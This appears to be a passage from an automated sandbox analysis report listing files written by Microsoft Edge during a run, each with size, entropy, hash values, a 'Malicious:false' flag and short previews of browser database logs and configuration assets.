                                                                                                                                                                                                                                                                                    Entropy (8bit):3.2743974703476995
                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                    SSDEEP:3:1sjgWIV//Uv:1qIFUv
                                                                                                                                                                                                                                                                                    MD5:46295CAC801E5D4857D09837238A6394
                                                                                                                                                                                                                                                                                    SHA1:44E0FA1B517DBF802B18FAF0785EEEA6AC51594B
                                                                                                                                                                                                                                                                                    SHA-256:0F1BAD70C7BD1E0A69562853EC529355462FCD0423263A3D39D6D0D70B780443
                                                                                                                                                                                                                                                                                    SHA-512:8969402593F927350E2CEB4B5BC2A277F3754697C1961E3D6237DA322257FBAB42909E1A742E22223447F3A4805F8D8EF525432A7C3515A549E984D3EFF72B23
                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                    Preview:MANIFEST-000001.
                                                                                                                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                    File Type:data
                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                    Size (bytes):33
                                                                                                                                                                                                                                                                                    Entropy (8bit):3.5394429593752084
                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                    SSDEEP:3:iWstvhYNrkUn:iptAd
                                                                                                                                                                                                                                                                                    MD5:F27314DD366903BBC6141EAE524B0FDE
                                                                                                                                                                                                                                                                                    SHA1:4714D4A11C53CF4258C3A0246B98E5F5A01FBC12
                                                                                                                                                                                                                                                                                    SHA-256:68C7AD234755B9EDB06832A084D092660970C89A7305E0C47D327B6AC50DD898
                                                                                                                                                                                                                                                                                    SHA-512:07A0D529D9458DE5E46385F2A9D77E0987567BA908B53DDB1F83D40D99A72E6B2E3586B9F79C2264A83422C4E7FC6559CAC029A6F969F793F7407212BB3ECD51
                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                    Preview:...m.................DB_VERSION.1
                                                                                                                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                    File Type:ASCII text
                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                    Size (bytes):16
                                                                                                                                                                                                                                                                                    Entropy (8bit):3.2743974703476995
                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                    SSDEEP:3:1sjgWIV//Uv:1qIFUv
                                                                                                                                                                                                                                                                                    MD5:46295CAC801E5D4857D09837238A6394
                                                                                                                                                                                                                                                                                    SHA1:44E0FA1B517DBF802B18FAF0785EEEA6AC51594B
                                                                                                                                                                                                                                                                                    SHA-256:0F1BAD70C7BD1E0A69562853EC529355462FCD0423263A3D39D6D0D70B780443
                                                                                                                                                                                                                                                                                    SHA-512:8969402593F927350E2CEB4B5BC2A277F3754697C1961E3D6237DA322257FBAB42909E1A742E22223447F3A4805F8D8EF525432A7C3515A549E984D3EFF72B23
                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                    Preview:MANIFEST-000001.
                                                                                                                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                    File Type:ASCII text
                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                    Size (bytes):309
                                                                                                                                                                                                                                                                                    Entropy (8bit):5.208902134584697
                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                    SSDEEP:6:EIoR1923oH+Tcwtp3hBtB2KLl+Imc+q2P923oH+Tcwtp3hBWsIFUv:F1Yebp3dFLNmc+v4Yebp3eFUv
                                                                                                                                                                                                                                                                                    MD5:13FF7DE3908C58E36FF3FA7F8A50F52E
                                                                                                                                                                                                                                                                                    SHA1:4E078CDF958CC85D8A5B66F29DD7B89297FF07C9
                                                                                                                                                                                                                                                                                    SHA-256:E4EFE2081E460F7099A6B1D87CA14A70CB0C2155F67183FF1C52C9B92BE4AFA9
                                                                                                                                                                                                                                                                                    SHA-512:0CAE1798A217A37E9CD2092B5AFDF16BBDA60B7631541BD1C79828317671A8FE23879C5511E104A9E1EDA3F5B26F246F2513EDBCE39E31A1F196C950C4425534
                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                    Preview:2024/12/23-00:57:52.550 1fec Creating DB C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\AdPlatform/auto_show_data.db since it was missing..2024/12/23-00:57:52.704 1fec Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\AdPlatform/auto_show_data.db/MANIFEST-000001.
                                                                                                                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                    File Type:OpenPGP Secret Key
                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                    Size (bytes):41
                                                                                                                                                                                                                                                                                    Entropy (8bit):4.704993772857998
                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                    SSDEEP:3:scoBAIxQRDKIVjn:scoBY7jn
                                                                                                                                                                                                                                                                                    MD5:5AF87DFD673BA2115E2FCF5CFDB727AB
                                                                                                                                                                                                                                                                                    SHA1:D5B5BBF396DC291274584EF71F444F420B6056F1
                                                                                                                                                                                                                                                                                    SHA-256:F9D31B278E215EB0D0E9CD709EDFA037E828F36214AB7906F612160FEAD4B2B4
                                                                                                                                                                                                                                                                                    SHA-512:DE34583A7DBAFE4DD0DC0601E8F6906B9BC6A00C56C9323561204F77ABBC0DC9007C480FFE4092FF2F194D54616CAF50AECBD4A1E9583CAE0C76AD6DD7C2375B
                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                    Preview:.|.."....leveldb.BytewiseComparator......
                                                                                                                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                    File Type:data
                                                                                                                                                                                                                                                                                    Category:modified
                                                                                                                                                                                                                                                                                    Size (bytes):2163821
                                                                                                                                                                                                                                                                                    Entropy (8bit):5.222867466424337
                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                    SSDEEP:24576:v+/PN8FofI/MXhZSihQgCmnVAEpENU2iOYcafbE2n:v+/PN8Gfx2mjF
                                                                                                                                                                                                                                                                                    MD5:CE336A7689D904676EF6D0751452B69F
                                                                                                                                                                                                                                                                                    SHA1:069320732550A5E489CB7DB18E06243E49DE2F46
                                                                                                                                                                                                                                                                                    SHA-256:BBD0C5712D7D161F689660D5F27DDB13CFA2B9EF6F137ABD9AD23A3B6F209FCC
                                                                                                                                                                                                                                                                                    SHA-512:0EE9C0600042ACC8BE060BDD9DDDFEF7B9064F374B100668DD5C481663D035E70CAE98819B76933E8D266ADDEF50D0E4C4CC156326C96DAFA4E022F4AB761E53
                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                    Preview:...m.................DB_VERSION.1.l.i.................QUERY_TIMESTAMP:arbitration_priority_list4.*.*.13340900604462938.$QUERY:arbitration_priority_list4.*.*..[{"name":"arbitration_priority_list","url":"https://edgeassetservice.azureedge.net/assets/arbitration_priority_list/4.0.5/asset?sv=2017-07-29&sr=c&sig=NtPyTqjbjPElpw2mWa%2FwOk1no4JFJEK8%2BwO4xQdDJO4%3D&st=2021-01-01T00%3A00%3A00Z&se=2023-12-30T00%3A00%3A00Z&sp=r&assetgroup=ArbitrationService","version":{"major":4,"minor":0,"patch":5},"hash":"N0MkrPHaUyfTgQSPaiVpHemLMcVgqoPh/xUYLZyXayg=","size":11749}]...................'ASSET_VERSION:arbitration_priority_list.4.0.5..ASSET:arbitration_priority_list.[{. "configVersion": 32,. "PrivilegedExperiences": [. "ShorelinePrivilegedExperienceID",. "SHOPPING_AUTO_SHOW_COUPONS_CHECKOUT",. "SHOPPING_AUTO_SHOW_LOWER_PRICE_FOUND",. "SHOPPING_AUTO_SHOW_BING_SEARCH",. "SHOPPING_AUTO_SHOW_REBATES",. "SHOPPING_AUTO_SHOW_REBATES_CONFIRMATION",. "SHOPPING_AUTO_SHOW_REBATES_DEACTI
                                                                                                                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                    File Type:ASCII text
                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                    Size (bytes):336
                                                                                                                                                                                                                                                                                    Entropy (8bit):5.071749848738965
                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                    SSDEEP:6:EI8Vq2P923oH+Tcwt9Eh1tIFUt8VIEkgZmw+VIE0IkwO923oH+Tcwt9Eh15LJ:F8Vv4Yeb9Eh16FUt8ahg/+abI5LYeb9O
                                                                                                                                                                                                                                                                                    MD5:2998299E421B5061BB3DC5F4631D12C4
                                                                                                                                                                                                                                                                                    SHA1:CFDC2EF248FDEEAF60098426CFCCC6528275BEA4
                                                                                                                                                                                                                                                                                    SHA-256:3BA1154495D42E213ED82E051A2C55EA3535ED801D08B10E70B26D7B7C27FA4A
                                                                                                                                                                                                                                                                                    SHA-512:A3D2E2C26AEA9D7795644BFB441155471911FA92BF12D1B1E0787DBCBA272779BC78FCB6CBE95FA84B7D518D486D12F48F30CAE07E2D742A54FEF4AD3B70306B
                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                    Preview:2024/12/23-00:57:52.406 2024 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Asset Store\assets.db/MANIFEST-000001.2024/12/23-00:57:52.407 2024 Recovering log #3.2024/12/23-00:57:52.412 2024 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Asset Store\assets.db/000003.log .
                                                                                                                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                    File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 1, database pages 7, cookie 0x3, schema 4, UTF-8, version-valid-for 1
                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                    Size (bytes):28672
                                                                                                                                                                                                                                                                                    Entropy (8bit):0.4632030495770934
                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                    SSDEEP:24:TLi5YFQq3qh7z3WMYziciNW9WkZ96UwOfBu9K:TouQq3qh7z3bY2LNW9WMcUvBu9K
                                                                                                                                                                                                                                                                                    MD5:F778CFA868961E093AA785965D471CD3
                                                                                                                                                                                                                                                                                    SHA1:651BE07DEB4148F58FDB8A6787B0E0F8B51522C3
                                                                                                                                                                                                                                                                                    SHA-256:8497D99C8F58ACC47C5C7E183EE28D5A517F8BD59367AAEB53925721C747092A
                                                                                                                                                                                                                                                                                    SHA-512:F5B4080B86555C77296789F3FA9CCC0EBBCDCB0DBF229BC627608993944BCF9D15FE98B43473FE386F453B10703C103D95024B9923E550ACCD4939A1F64BCB1F
                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                    File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 5, database pages 5, cookie 0x5, schema 4, UTF-8, version-valid-for 5
                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                    Size (bytes):10240
                                                                                                                                                                                                                                                                                    Entropy (8bit):0.8708334089814068
                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                    SSDEEP:12:LBtW4mqsmvEFUU30dZV3lY7+YNbr1dj3BzA2ycFUxOUDaazMvbKGxiTUwZ79GV:LLaqEt30J2NbDjfy6UOYMvbKGxjgm
                                                                                                                                                                                                                                                                                    MD5:92F9F7F28AB4823C874D79EDF2F582DE
                                                                                                                                                                                                                                                                                    SHA1:2D4F1B04C314C79D76B7FF3F50056ECA517C338B
                                                                                                                                                                                                                                                                                    SHA-256:6318FCD9A092D1F5B30EBD9FB6AEC30B1AEBD241DC15FE1EEED3B501571DA3C7
                                                                                                                                                                                                                                                                                    SHA-512:86FEF0E05F871A166C3FAB123B0A4B95870DCCECBE20B767AF4BDFD99653184BBBFE4CE1EDF17208B7700C969B65B8166EE264287B613641E7FDD55A6C09E6D4
                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                    File Type:ASCII text
                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                    Size (bytes):348
                                                                                                                                                                                                                                                                                    Entropy (8bit):5.20791529130883
                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                    SSDEEP:6:ERIF4q2P923oH+TcwtnG2tMsIFUt8VRIsJZmw+VRIsDkwO923oH+TcwtnG2tMsLJ:PF4v4Yebn9GFUt8ksJ/+ksD5LYebn95J
                                                                                                                                                                                                                                                                                    MD5:8C070C4B47E3EA39607C70E709786640
                                                                                                                                                                                                                                                                                    SHA1:D7BA1087CFF24F0B4E998CA3317B2FAB0182C24D
                                                                                                                                                                                                                                                                                    SHA-256:A6F22A901586CCDD5DFC268ACBDA6CEE542328D4C9FC26D33CE6518C34927F52
                                                                                                                                                                                                                                                                                    SHA-512:EEB4EDFD4E96E88D386CFF1AA3431973009113401624A6B71EF13C000C02166F6DEC5E9A58CB58D9ADD229A83556162C004275E6DE2A554312DF0A2622E26E2C
                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                    Preview:2024/12/23-00:57:47.625 1ff4 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\EdgeCoupons/coupons_data.db/MANIFEST-000001.2024/12/23-00:57:47.626 1ff4 Recovering log #3.2024/12/23-00:57:47.626 1ff4 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\EdgeCoupons/coupons_data.db/000003.log .
                                                                                                                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                    File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 6, database pages 5, cookie 0x5, schema 4, UTF-8, version-valid-for 6
                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                    Size (bytes):20480
                                                                                                                                                                                                                                                                                    Entropy (8bit):0.6133727142136643
                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                    SSDEEP:24:TLapR+DDNzWjJ0npnyXKUO8+jaxfypgxsmL:TO8D4jJ/6Up+A/J
                                                                                                                                                                                                                                                                                    MD5:1803DA0EF5448F480AA5E1631A6AFA85
                                                                                                                                                                                                                                                                                    SHA1:E9A77DB3F276EE54CAC9E90F5874E249206086E8
                                                                                                                                                                                                                                                                                    SHA-256:A80E5DDF60F6C9D24154D6975015873A317C27738FF2075BFE056B6199C347E6
                                                                                                                                                                                                                                                                                    SHA-512:E362670DCD4A17D61C6082C8F6930BEE740812CA87CFFF2131F68B10181EAEF5F73838CC3FDCD09FD961F037AE7668C15A6A619C050D9F6526B6EF41828A1E8B
                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                    Preview:SQLite format 3......@ ..........................................................................j...%.................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                    File Type:ASCII text
                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                    Size (bytes):16
                                                                                                                                                                                                                                                                                    Entropy (8bit):3.2743974703476995
                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                    SSDEEP:3:1sjgWIV//Uv:1qIFUv
                                                                                                                                                                                                                                                                                    MD5:46295CAC801E5D4857D09837238A6394
                                                                                                                                                                                                                                                                                    SHA1:44E0FA1B517DBF802B18FAF0785EEEA6AC51594B
                                                                                                                                                                                                                                                                                    SHA-256:0F1BAD70C7BD1E0A69562853EC529355462FCD0423263A3D39D6D0D70B780443
                                                                                                                                                                                                                                                                                    SHA-512:8969402593F927350E2CEB4B5BC2A277F3754697C1961E3D6237DA322257FBAB42909E1A742E22223447F3A4805F8D8EF525432A7C3515A549E984D3EFF72B23
                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                    Preview:MANIFEST-000001.
                                                                                                                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                    File Type:data
                                                                                                                                                                                                                                                                                    Category:modified
                                                                                                                                                                                                                                                                                    Size (bytes):375520
                                                                                                                                                                                                                                                                                    Entropy (8bit):5.354130057244226
                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                    SSDEEP:6144:nA/imBpx6WdPSxKWcHu5MURacq49QxxPnyEndBuHltBfdK5WNbsVEziP/CfXtLPz:nFdMyq49tEndBuHltBfdK5WNbsVEziPU
                                                                                                                                                                                                                                                                                    MD5:4A3665A5C70337B02E8E337758CB84C4
                                                                                                                                                                                                                                                                                    SHA1:B4238E1114AE18472D2D33D84B711ADFC1C27D57
                                                                                                                                                                                                                                                                                    SHA-256:6D1846E54835C002783BEECBE774D723579FA626D8B65892B7A86D064655E690
                                                                                                                                                                                                                                                                                    SHA-512:E20681FCBDC4512BD480ABD98EDF7853CA3C79C6526934FA9ACDB109444AEB944180418121F0E5F1EB0873F08BA52570D61480C8BC7FB89CA343BE046BEA952D
                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                    Preview:...m.................DB_VERSION.1...hq...............&QUERY_TIMESTAMP:domains_config_gz2.*.*.13379407076091917..QUERY:domains_config_gz2.*.*..[{"name":"domains_config_gz","url":"https://edgeassetservice.azureedge.net/assets/domains_config_gz/2.8.76/asset?assetgroup=EntityExtractionDomainsConfig","version":{"major":2,"minor":8,"patch":76},"hash":"78Xsq/1H+MXv88uuTT1Rx79Nu2ryKVXh2J6ZzLZd38w=","size":374872}]..*.`~...............ASSET_VERSION:domains_config_gz.2.8.76..ASSET:domains_config_gz...{"config": {"token_limit": 1600, "page_cutoff": 4320, "default_locale_map": {"bg": "bg-bg", "bs": "bs-ba", "el": "el-gr", "en": "en-us", "es": "es-mx", "et": "et-ee", "cs": "cs-cz", "da": "da-dk", "de": "de-de", "fa": "fa-ir", "fi": "fi-fi", "fr": "fr-fr", "he": "he-il", "hr": "hr-hr", "hu": "hu-hu", "id": "id-id", "is": "is-is", "it": "it-it", "ja": "ja-jp", "ko": "ko-kr", "lv": "lv-lv", "lt": "lt-lt", "mk": "mk-mk", "nl": "nl-nl", "nb": "nb-no", "no": "no-no", "pl": "pl-pl", "pt": "pt-pt", "ro": "
                                                                                                                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                    File Type:ASCII text
                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                    Size (bytes):311
                                                                                                                                                                                                                                                                                    Entropy (8bit):5.14190167034447
                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                    SSDEEP:6:EIcps1923oH+Tcwtk2WwnvB2KLl+IsN1yq2P923oH+Tcwtk2WwnvIFUv:FoBYebkxwnvFLNYyv4YebkxwnQFUv
                                                                                                                                                                                                                                                                                    MD5:E1B8D45D9AAE19F02E58C7B04B701E4A
                                                                                                                                                                                                                                                                                    SHA1:3C2906E1F0CE3132EEB4798E5DB225E324A9B673
                                                                                                                                                                                                                                                                                    SHA-256:D9C3CACF4DC545A3D7256426C34FAE8A640C34427BF0EF3BC3FB133E68793E05
                                                                                                                                                                                                                                                                                    SHA-512:5A2B5A7868871B05BB2EC4737C90362E1B832AE782BC820ED66FAFE5FAC83AE5549C5B749FE00F462DC85790CA1B0CF338DCDB32EEDE8CC934896091209273D2
                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                    Preview:2024/12/23-00:57:52.427 20a0 Creating DB C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\EntityExtractionAssetStore.db since it was missing..2024/12/23-00:57:52.468 20a0 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\EntityExtractionAssetStore.db/MANIFEST-000001.
                                                                                                                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                    File Type:OpenPGP Secret Key
                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                    Size (bytes):41
                                                                                                                                                                                                                                                                                    Entropy (8bit):4.704993772857998
                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                    SSDEEP:3:scoBAIxQRDKIVjn:scoBY7jn
                                                                                                                                                                                                                                                                                    MD5:5AF87DFD673BA2115E2FCF5CFDB727AB
                                                                                                                                                                                                                                                                                    SHA1:D5B5BBF396DC291274584EF71F444F420B6056F1
                                                                                                                                                                                                                                                                                    SHA-256:F9D31B278E215EB0D0E9CD709EDFA037E828F36214AB7906F612160FEAD4B2B4
                                                                                                                                                                                                                                                                                    SHA-512:DE34583A7DBAFE4DD0DC0601E8F6906B9BC6A00C56C9323561204F77ABBC0DC9007C480FFE4092FF2F194D54616CAF50AECBD4A1E9583CAE0C76AD6DD7C2375B
                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                    Preview:.|.."....leveldb.BytewiseComparator......
                                                                                                                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                    File Type:JSON data
                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                    Size (bytes):358859
                                                                                                                                                                                                                                                                                    Entropy (8bit):5.324597167497449
                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                    SSDEEP:6144:CgimBVvUrsc6rRA81b/18jyJNjfvrfM6RH:C1gAg1zfvv
                                                                                                                                                                                                                                                                                    MD5:47D825F34D90AD13109E1B85820F47B4
                                                                                                                                                                                                                                                                                    SHA1:36CF9BD7A884A81CF5DF1C78915C393BBB50AA2C
                                                                                                                                                                                                                                                                                    SHA-256:1F1203A041E4A2444C5D35A4A6EC0114704B850E8DAAEDD2F6C2946DE28EB3A2
                                                                                                                                                                                                                                                                                    SHA-512:37EB08DE2DC58E94776A0BFE06595ED702414BF9B38BBA9BA82C98F983AF8C0C19C76F82771EF36F7EFF2D36BF52FAA779763B7D95FD8EB809EBC5690F873C0C
                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                    Preview:{"aee_config":{"ar":{"price_regex":{"ae":"(((ae|aed|\\x{062F}\\x{0660}\\x{0625}\\x{0660}|\\x{062F}\\.\\x{0625}|dhs|dh)\\s*\\d{1,3})|(\\d{1,3}\\s*(ae|aed|\\x{062F}\\x{0660}\\x{0625}\\x{0660}|\\x{062F}\\.\\x{0625}|dhs|dh)))","dz":"(((dzd|da|\\x{062F}\\x{062C})\\s*\\d{1,3})|(\\d{1,3}\\s*(dzd|da|\\x{062F}\\x{062C})))","eg":"(((e\\x{00a3}|egp)\\s*\\d{1,3})|(\\d{1,3}\\s*(e\\x{00a3}|egp)))","ma":"(((mad|dhs|dh)\\s*\\d{1,3})|(\\d{1,3}\\s*(mad|dhs|dh)))","sa":"((\\d{1,3}\\s*(sar\\s*\\x{fdfc}|sar|sr|\\x{fdfc}|\\.\\x{0631}\\.\\x{0633}))|((sar\\s*\\x{fdfc}|sar|sr|\\x{fdfc}|\\.\\x{0631}\\.\\x{0633})\\s*\\d{1,3}))"},"product_terms":"((\\x{0623}\\x{0636}\\x{0641}\\s*\\x{0625}\\x{0644}\\x{0649}\\s*\\x{0627}\\x{0644}\\x{0639}\\x{0631}\\x{0628}\\x{0629})|(\\x{0623}\\x{0636}\\x{0641}\\s*\\x{0625}\\x{0644}\\x{0649}\\s*\\x{0627}\\x{0644}\\x{062D}\\x{0642}\\x{064A}\\x{0628}\\x{0629})|(\\x{0627}\\x{0634}\\x{062A}\\x{0631}\\x{064A}\\s*\\x{0627}\\x{0644}\\x{0622}\\x{0646})|(\\x{062E}\\x{064A}\\x{0627}\\x{0631}
                                                                                                                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                    File Type:data
                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                    Size (bytes):418
                                                                                                                                                                                                                                                                                    Entropy (8bit):1.8784775129881184
                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                    SSDEEP:6:qTCTCTCTCTCTCTCTCTCTCTCTCTCTCTCTCTCTCTCTCTCT:qWWWWWWWWWWWWWWWWWWWWW
                                                                                                                                                                                                                                                                                    MD5:BF097D724FDF1FCA9CF3532E86B54696
                                                                                                                                                                                                                                                                                    SHA1:4039A5DD607F9FB14018185F707944FE7BA25EF7
                                                                                                                                                                                                                                                                                    SHA-256:1B8B50A996172C16E93AC48BCB94A3592BEED51D3EF03F87585A1A5E6EC37F6B
                                                                                                                                                                                                                                                                                    SHA-512:31857C157E5B02BCA225B189843CE912A792A7098CEA580B387977B29E90A33C476DF99AD9F45AD5EB8DA1EFFD8AC3A78870988F60A32D05FA2DA8F47794FACE
                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                    Preview:.f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5...............
                                                                                                                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                    File Type:ASCII text
                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                    Size (bytes):324
                                                                                                                                                                                                                                                                                    Entropy (8bit):5.193415047825352
                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                    SSDEEP:6:ERR4q2P923oH+Tcwt8aPrqIFUt8VRINNJZmw+VRINNDkwO923oH+Tcwt8amLJ:+4v4YebL3FUt8snJ/+snD5LYebQJ
                                                                                                                                                                                                                                                                                    MD5:4421138AD9E604A01667685EADD4E565
                                                                                                                                                                                                                                                                                    SHA1:E64A45A4E10267151D4220F8B0AA3460D2F8A65A
                                                                                                                                                                                                                                                                                    SHA-256:6291106D7FF573BE0552A097ACF9A1B896F7066FFF8854848C032DDF75A5E331
                                                                                                                                                                                                                                                                                    SHA-512:0E07896DA06D0D99B7AD4AF65C14AE15E19D13B68D2DC9FEB3AB4B458A6F9D7644CD4E021819AED6612C22C2C5EA19BB484965177D2EEF7147D840705F19B81D
                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                    Preview:2024/12/23-00:57:47.637 1ff4 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extension Rules/MANIFEST-000001.2024/12/23-00:57:47.638 1ff4 Recovering log #3.2024/12/23-00:57:47.638 1ff4 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extension Rules/000003.log .
                                                                                                                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                    File Type:ASCII text
                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                    Size (bytes):328
                                                                                                                                                                                                                                                                                    Entropy (8bit):5.201526715958087
                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                    SSDEEP:6:ERdIL4q2P923oH+Tcwt865IFUt8VRraNNJZmw+VRfILDkwO923oH+Tcwt86+ULJ:++4v4Yeb/WFUt8KnJ/+ULD5LYeb/+SJ
                                                                                                                                                                                                                                                                                    MD5:BFED54BA9C4ED61CEA8B173DE8F96F3D
                                                                                                                                                                                                                                                                                    SHA1:99298FD1017DFD48B28D5097F8AE8B091D487229
                                                                                                                                                                                                                                                                                    SHA-256:D0D80D3A68F5EED8B106D8CADC20EDD9F9295439CCD5A5327989F5FE81D07DF1
                                                                                                                                                                                                                                                                                    SHA-512:0953C2C5FB0BB49371E938116F2461A93AF66C74080A1F1828D6EFF818D2A94F0D0241B05893D20384297957A4BE696E7DE82F7D9BA3C054DF556B6518819841
                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                    Preview:2024/12/23-00:57:47.652 1ff4 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extension Scripts/MANIFEST-000001.2024/12/23-00:57:47.654 1ff4 Recovering log #3.2024/12/23-00:57:47.799 1ff4 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extension Scripts/000003.log .
                                                                                                                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                    File Type:data
                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                    Size (bytes):1254
                                                                                                                                                                                                                                                                                    Entropy (8bit):1.8784775129881184
                                                                                                                                                                                                                                                                                    Encrypted:false
